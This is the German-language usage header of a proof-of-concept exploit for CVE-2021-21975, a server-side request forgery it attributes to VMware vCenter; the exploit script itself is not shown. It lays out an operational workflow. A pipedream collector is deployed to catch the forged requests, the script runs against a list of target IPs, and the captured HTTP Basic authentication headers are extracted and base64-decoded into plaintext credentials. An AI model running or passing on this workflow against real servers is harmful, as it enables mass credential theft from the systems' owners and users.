
Proof-of-Concept-Exploit für CVE-2021-21975 (VMware vCenter Server SSRF), der eine serverseitige Anforderungsfälschung ausnutzt, um base64-kodierte Anmeldeinformationen über HTTP-Basic-Authentifizierung preiszugeben.
#SSRF-POC - SSRF zu Credential-Leak
#Zuerst den pd-Client konfigurieren.
#Führen Sie nun ./pd deploy http-new-requests aus.
#Ersetzen Sie nun den pipedream-HTTP-Request (z. B. Randomstring.m.pipedream.net) im Skript.
#Führen Sie dies in einem separaten Terminal aus: ./pd logs new-requests | tee -a req.txt
#Und führen Sie nun in einem weiteren Terminal aus: python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"Dies ist ein früher Proof-of-Concept, der erstellt wurde, als die Sicherheitslücke vor einigen Monaten öffentlich wurde. Verwenden Sie ihn auf eigenes Risiko." :V
#Danksagung @wabaf3t @D0rkerDevil